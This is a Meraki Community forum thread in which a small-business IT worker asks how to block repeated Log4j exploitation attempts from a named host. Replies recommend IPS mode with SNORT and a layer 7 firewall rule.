Hammered with IDS alerts

Getting noticed

Hammered with IDS alerts

Hi guys,


For a few weeks now, we have been hammered with Apache Log4j logging remote code execution attempts from host0484.sdjihtbwyu8rtgutrw.com / How can I absolutely ensure this traffic is dropped?


The MX identifies that this traffic originates from Poland, so I have added that country to our Geo blocklist. I've also added a L7 rule to deny this IP. Are there any other steps I should take to combat this threat actor? We are an SME and there's only a handful of us in IT, none of us are security specialists, so I want to make as sure as I can that this IP is blackholed, blocked, bounced, whatever - as long as it doesn't get though!


Thanks all

J 🙂

3 Replies 3
Here to help



if your MX is running in IPS mode with Security ruleset selected and if your firmware is up to date the SNORT engine will catch these for you.


Had these at several customer sites and it was always catched by the MX. Regardless of the source IP.

Kind of a big deal
Kind of a big deal

Create a layer 7 firewall rule blocking traffic for this host.  This blocks both inbound and outbound traffic.


Kind of a big deal
Kind of a big deal



Get notified when there are additional replies to this discussion.
Welcome to the Meraki Community!
To start contributing, simply sign in with your Cisco account. If you don't yet have a Cisco account, you can sign up.